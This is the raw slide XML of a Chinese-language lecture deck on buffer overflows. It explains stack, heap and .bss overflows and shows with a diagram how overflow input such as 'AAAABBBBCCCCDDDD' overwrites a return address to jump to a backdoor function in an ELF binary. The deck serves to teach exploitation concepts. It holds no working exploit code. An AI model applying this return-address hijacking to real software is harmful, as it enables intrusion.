            <a:ext cx="6096000" cy="4801314"/>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介绍完背景知识，就可以继续回归栈溢出攻击的主题了。当函数正在执行内部指令的过程中我们无法拿到程序的控制权，只有在发生函数调用或者结束函数调用时，程序的控制权会在函数状态之间发生跳转，这时才可以通过修改函数状态来实现攻击。而控制程序执行指令最关键的寄存器就是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，所以我们的目标就是让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载入攻击指令的地址。</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先来看看函数调用结束时，如果要让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指向攻击指令，需要哪些准备？首先，在退栈过程中，返回地址会被传给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，所以我们只需要让溢出数据用攻击指令的地址来覆盖返回地址就可以了。其次，我们可以在溢出数据内包含一段攻击指令，也可以在内存其他位置寻找可用的攻击指令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57831AC0-1B47-4D33-BC42-9E8780D37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016" y="1337623"/>
            <a:ext cx="4648849" cy="4363059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8779BD-8090-4AD4-813C-AFEB35FB4A3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217258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0C481B-D494-47C5-8F71-186891DAC39B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848997" y="2708299"/>
            <a:ext cx="6469487" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>栈溢出</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Stack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最常见、漏洞比例最高、危害最大的二进制漏洞</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 </a:t>
            </a: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中往往是漏洞利用的基础</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堆溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Heap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堆管理器复杂，利用花样繁多</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中的常见题型</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段溢出</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攻击效果依赖于 </a:t>
            </a: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上存放了何种控制数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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DB38616A-CA48-491F-8D7F-2091DCF2F185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="1520186"/>
            <a:ext cx="4600490"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缓冲区溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Buffer overflow</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C0C52FDD-EB67-4B53-B15A-93780AD31B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="2160409"/>
            <a:ext cx="8451643"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本质是向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>定长的缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中写入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>超长的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，造成超出的数据覆写了合法内存区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4C1899-CC07-4BE6-B38E-A4E92CB71A6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35592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Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465957" y="2177046"/>
            <a:ext cx="3181980" cy="1342106"/>
            <a:chOff x="1797175" y="2320925"/>
            <a:chExt cx="2537400" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>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return address</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>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2865875"/>
              <a:ext cx="2537400" cy="48929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r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>buf</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5309234" y="1420600"/>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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6075B8-B87E-4086-B36F-B820E5E68CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2177046"/>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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8620865-4103-47E3-BF99-162ACC0B60D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465956" y="4227843"/>
            <a:ext cx="3181983" cy="1342106"/>
            <a:chOff x="1797173" y="2320925"/>
            <a:chExt cx="2537402" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8058C4A4-18F0-4891-A6CA-2E09369A3DC6}"/>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DDDD</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4227550-B0E5-49E9-88E2-0CC328226EB9}"/>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CCCC</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C00044-7DE2-424C-B616-C475C0722513}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797173" y="2865875"/>
              <a:ext cx="2537402" cy="23627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BBBB</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1C2579-6FA2-4DCF-A024-F08B3C64ED4A}"/>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1" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FD534D-3ACD-44EC-B154-D8AB63ACC254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4227843"/>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a:t>
            </a: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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="直接箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F9DDA-2062-41E2-B29A-352B00F54906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056947" y="3519152"/>
            <a:ext cx="0" cy="70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2D2E9AD-C011-483F-87F8-DDA863C32FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317147" y="3683561"/>
            <a:ext cx="3315010"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输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 650">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922F5A2B-BAA9-4911-B65E-E35FB23619DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465955" y="5130172"/>
            <a:ext cx="3181983" cy="287478"/>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AAAA</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F136B0-BD15-4B67-8EB9-C4EEC188F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825875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A93B0BAB-2F16-46A9-97CC-90D4C00E5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6426558" y="399245"/>
            <a:ext cx="3883021" cy="6246254"/>
            <a:chOff x="4584879" y="992499"/>
            <a:chExt cx="5738969" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9289E-73FE-49AF-B6F4-0900DF5D5FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584879" y="992499"/>
              <a:ext cx="5738969" cy="5601480"/>
              <a:chOff x="4897550" y="888136"/>
              <a:chExt cx="1363200" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B570F3-A096-4B70-BE99-92F5DB78D599}"/>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6B2C601E-D1C3-428E-AEAC-1E25E4FDE7A8}"/>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2417D00D-B973-4A6F-B7B9-5A3DDEB7F146}"/>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07A56EF6-4FB8-4E94-A5C1-50DF5761DCB0}"/>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707381BE-9F57-472D-A9D6-4B032B784029}"/>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97B8DF59-E4C5-4FD2-A237-586D621D29B3}"/>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E931A1D2-481B-4BB9-891B-84E7E8BCFE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3361338"/>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9893FB29-F450-49FA-BC66-8C71333CB434}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3635538"/>
                <a:ext cx="1363200" cy="59883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81F4E38F-7208-4D9C-B943-2280EFFD6742}"/>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2B56582F-1891-49BA-9F55-08C133B125D1}"/>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8EAAC46-FCCD-4964-980A-AAFF78D1D986}"/>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29" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82D5E77-3B99-4ED7-9D49-E74A5C908844}"/>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backdoor_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66390BC5-F328-44DF-B6AE-7DBFD4626842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10467614" y="1017485"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22386C21-3C35-4D7A-8DE1-7548ACAA8C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10555224" y="5471183"/>
            <a:ext cx="683616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB105-A862-43D0-B8CE-5D59E5E670DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6426556" y="1489762"/>
            <a:ext cx="3" cy="4262596"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 762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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB87570-AA3A-41C6-9354-F57105467229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426556" y="4335166"/>
            <a:ext cx="3883021" cy="33981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39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA77EA5-89D3-4070-BA8F-BF1776AF1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426555" y="5612333"/>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backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> in ELF</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D519EE-BF54-4641-887A-627D5353173E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="30651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篡改栈帧上的返回地址为程序中已有的后门函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DF81C6-7849-475A-BAB9-9D552070BB0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84307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763447" y="602355"/>
            <a:ext cx="3883027" cy="5653289"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5069724"/>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069724"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3276746"/>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1581"/>
                <a:ext cx="1363200" cy="27671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8" y="3338736"/>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F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3613971"/>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3890682"/>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1682"/>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04511" y="1220595"/>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p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6572996" y="1502416"/>
            <a:ext cx="380913" cy="4"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5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763450" y="4536254"/>
            <a:ext cx="3883021" cy="287942"/>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763450" y="1171934"/>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E46CE33E-2848-4445-9B59-658F83F77458}"/>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3C3D8B2A-4D70-4133-8B65-0320F68FEBF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3773523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8" y="305873"/>
            <a:ext cx="3883024" cy="6246254"/>
            <a:chOff x="4584874" y="992499"/>
            <a:chExt cx="5738974" cy="5601480"/>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74" y="992499"/>
              <a:ext cx="5738973" cy="5601480"/>
              <a:chOff x="4897549" y="888136"/>
              <a:chExt cx="1363201" cy="362043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68175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957664"/>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924113"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A27E8BD-EE3F-4447-9D68-66DAEB5233CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10760237" y="4556015"/>
            <a:ext cx="683616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Bss</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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1396390"/>
            <a:ext cx="4" cy="3388932"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5715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241794"/>
            <a:ext cx="3883021" cy="88090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4645297"/>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6FC4DA90-B1DB-4350-B58E-A948D3187F02}"/>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5D428442-E10F-4CA8-8CF0-A41520AFB67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56037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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DCBC81-C36E-4A6A-839A-B657420011F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="23740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 Code (p1.c p2.c)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD4CB35-5293-4C26-9202-591B5C102BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="30841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Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (p1.s p2.s)</a:t>
            </a:r>
